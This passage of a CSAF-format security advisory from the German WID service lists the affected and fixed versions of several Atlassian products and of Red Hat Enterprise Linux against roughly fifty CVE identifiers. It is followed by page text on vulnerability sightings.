"summary": "WID-SEC-W-2026-1955 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1955.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1955 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1955"
},
{
"category": "external",
"summary": "Atlassian Security Bulletin Juni vom 2026-06-16",
"url": "https://confluence.atlassian.com/security/security-bulletin-june-16-2026-1796309326.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:22380 vom 2026-06-18",
"url": "https://access.redhat.com/errata/RHSA-2026:22380"
}
],
"source_lang": "en-US",
"title": "Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira und Jira Service Management: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-06-17T22:00:00.000+00:00",
"generator": {
"date": "2026-06-18T07:59:55.017+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1955",
"initial_release_date": "2026-06-16T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-06-16T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-06-17T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "Data Center \u003c12.1.8",
"product": {
"name": "Atlassian Bamboo Data Center \u003c12.1.8",
"product_id": "T055489"
}
},
{
"category": "product_version",
"name": "Data Center 12.1.8",
"product": {
"name": "Atlassian Bamboo Data Center 12.1.8",
"product_id": "T055489-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bamboo:data_center__12.1.8"
}
}
},
{
"category": "product_version_range",
"name": "Data Center \u003c10.2.20",
"product": {
"name": "Atlassian Bamboo Data Center \u003c10.2.20",
"product_id": "T055490"
}
},
{
"category": "product_version",
"name": "Data Center 10.2.20",
"product": {
"name": "Atlassian Bamboo Data Center 10.2.20",
"product_id": "T055490-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bamboo:data_center__10.2.20"
}
}
}
],
"category": "product_name",
"name": "Bamboo"
},
{
"branches": [
{
"category": "product_version_range",
"name": "Data Center \u003c10.2.4",
"product": {
"name": "Atlassian Bitbucket Data Center \u003c10.2.4",
"product_id": "T055492"
}
},
{
"category": "product_version",
"name": "Data Center 10.2.4",
"product": {
"name": "Atlassian Bitbucket Data Center 10.2.4",
"product_id": "T055492-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bitbucket:data_center__10.2.4"
}
}
},
{
"category": "product_version_range",
"name": "Data Center \u003c9.4.21",
"product": {
"name": "Atlassian Bitbucket Data Center \u003c9.4.21",
"product_id": "T055493"
}
},
{
"category": "product_version",
"name": "Data Center 9.4.21",
"product": {
"name": "Atlassian Bitbucket Data Center 9.4.21",
"product_id": "T055493-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bitbucket:data_center__9.4.21"
}
}
},
{
"category": "product_version_range",
"name": "Data Center \u003c10.3.1",
"product": {
"name": "Atlassian Bitbucket Data Center \u003c10.3.1",
"product_id": "T055494"
}
},
{
"category": "product_version",
"name": "Data Center 10.3.1",
"product": {
"name": "Atlassian Bitbucket Data Center 10.3.1",
"product_id": "T055494-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bitbucket:data_center__10.3.1"
}
}
}
],
"category": "product_name",
"name": "Bitbucket"
},
{
"branches": [
{
"category": "product_version_range",
"name": "Data Center \u003c10.2.13",
"product": {
"name": "Atlassian Confluence Data Center \u003c10.2.13",
"product_id": "T055495"
}
},
{
"category": "product_version",
"name": "Data Center 10.2.13",
"product": {
"name": "Atlassian Confluence Data Center 10.2.13",
"product_id": "T055495-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:confluence:data_center__10.2.13"
}
}
},
{
"category": "product_version_range",
"name": "Data Center \u003c9.2.21",
"product": {
"name": "Atlassian Confluence Data Center \u003c9.2.21",
"product_id": "T055496"
}
},
{
"category": "product_version",
"name": "Data Center 9.2.21",
"product": {
"name": "Atlassian Confluence Data Center 9.2.21",
"product_id": "T055496-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:confluence:data_center__9.2.21"
}
}
}
],
"category": "product_name",
"name": "Confluence"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c4.9.11",
"product": {
"name": "Atlassian Crucible \u003c4.9.11",
"product_id": "T055498"
}
},
{
"category": "product_version",
"name": "4.9.11",
"product": {
"name": "Atlassian Crucible 4.9.11",
"product_id": "T055498-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:crucible:4.9.11"
}
}
}
],
"category": "product_name",
"name": "Crucible"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c4.9.11",
"product": {
"name": "Atlassian Fisheye \u003c4.9.11",
"product_id": "T055497"
}
},
{
"category": "product_version",
"name": "4.9.11",
"product": {
"name": "Atlassian Fisheye 4.9.11",
"product_id": "T055497-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:fisheye:4.9.11"
}
}
}
],
"category": "product_name",
"name": "Fisheye"
},
{
"branches": [
{
"category": "product_version_range",
"name": "Data Center \u003c11.3.7",
"product": {
"name": "Atlassian Jira Data Center \u003c11.3.7",
"product_id": "T055499"
}
},
{
"category": "product_version",
"name": "Data Center 11.3.7",
"product": {
"name": "Atlassian Jira Data Center 11.3.7",
"product_id": "T055499-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:jira:data_center__11.3.7"
}
}
},
{
"category": "product_version_range",
"name": "Data Center \u003c10.3.22",
"product": {
"name": "Atlassian Jira Data Center \u003c10.3.22",
"product_id": "T055500"
}
},
{
"category": "product_version",
"name": "Data Center 10.3.22",
"product": {
"name": "Atlassian Jira Data Center 10.3.22",
"product_id": "T055500-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:jira:data_center__10.3.22"
}
}
},
{
"category": "product_version_range",
"name": "Service Management Data Center and Server \u003c11.3.7",
"product": {
"name": "Atlassian Jira Service Management Data Center and Server \u003c11.3.7",
"product_id": "T055501"
}
},
{
"category": "product_version",
"name": "Service Management Data Center and Server 11.3.7",
"product": {
"name": "Atlassian Jira Service Management Data Center and Server 11.3.7",
"product_id": "T055501-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:jira:service_management_data_center_and_server__11.3.7"
}
}
},
{
"category": "product_version_range",
"name": "Service Management Data Center and Server \u003c10.3.22",
"product": {
"name": "Atlassian Jira Service Management Data Center and Server \u003c10.3.22",
"product_id": "T055502"
}
},
{
"category": "product_version",
"name": "Service Management Data Center and Server 10.3.22",
"product": {
"name": "Atlassian Jira Service Management Data Center and Server 10.3.22",
"product_id": "T055502-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:jira:service_management_data_center_and_server__10.3.22"
}
}
}
],
"category": "product_name",
"name": "Jira"
}
],
"category": "vendor",
"name": "Atlassian"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-11272",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2019-11272"
},
{
"cve": "CVE-2021-3803",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2021-3803"
},
{
"cve": "CVE-2022-1471",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2022-1471"
},
{
"cve": "CVE-2022-22965",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2022-22965"
},
{
"cve": "CVE-2022-22978",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2022-22978"
},
{
"cve": "CVE-2022-31692",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2022-31692"
},
{
"cve": "CVE-2024-22257",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2024-22257"
},
{
"cve": "CVE-2025-22228",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2025-22228"
},
{
"cve": "CVE-2026-22732",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-22732"
},
{
"cve": "CVE-2026-24734",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-24734"
},
{
"cve": "CVE-2026-26996",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-26996"
},
{
"cve": "CVE-2026-27903",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-27903"
},
{
"cve": "CVE-2026-27904",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-27904"
},
{
"cve": "CVE-2026-29129",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-29129"
},
{
"cve": "CVE-2026-33870",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-33870"
},
{
"cve": "CVE-2026-33871",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-33871"
},
{
"cve": "CVE-2026-34077",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-34077"
},
{
"cve": "CVE-2026-34486",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-34486"
},
{
"cve": "CVE-2026-34487",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-34487"
},
{
"cve": "CVE-2026-40175",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-40175"
},
{
"cve": "CVE-2026-41044",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-41044"
},
{
"cve": "CVE-2026-41284",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-41284"
},
{
"cve": "CVE-2026-41293",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-41293"
},
{
"cve": "CVE-2026-42033",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42033"
},
{
"cve": "CVE-2026-42035",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42035"
},
{
"cve": "CVE-2026-42038",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42038"
},
{
"cve": "CVE-2026-42043",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42043"
},
{
"cve": "CVE-2026-42198",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42198"
},
{
"cve": "CVE-2026-42211",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42211"
},
{
"cve": "CVE-2026-42264",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42264"
},
{
"cve": "CVE-2026-42342",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42342"
},
{
"cve": "CVE-2026-42498",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42498"
},
{
"cve": "CVE-2026-42579",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42581",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42583",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42587",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-43512",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-43512"
},
{
"cve": "CVE-2026-43513",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-43513"
},
{
"cve": "CVE-2026-43515",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-43515"
},
{
"cve": "CVE-2026-44486",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-44486"
},
{
"cve": "CVE-2026-44487",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-44487"
},
{
"cve": "CVE-2026-44488",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-44488"
},
{
"cve": "CVE-2026-44492",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-44492"
},
{
"cve": "CVE-2026-44495",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-44495"
},
{
"cve": "CVE-2026-44496",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-44496"
},
{
"cve": "CVE-2026-45149",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-45149"
},
{
"cve": "CVE-2026-45736",
"product_status": {
"known_affected": [
"T055498",
"T055497",
"T055496",
"T055495",
"T055494",
"67646",
"T055493",
"T055492",
"T055502",
"T055501",
"T055489",
"T055500",
"T055499",
"T055490"
]
},
"release_date": "2026-06-16T22:00:00.000+00:00",
"title": "CVE-2026-45736"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…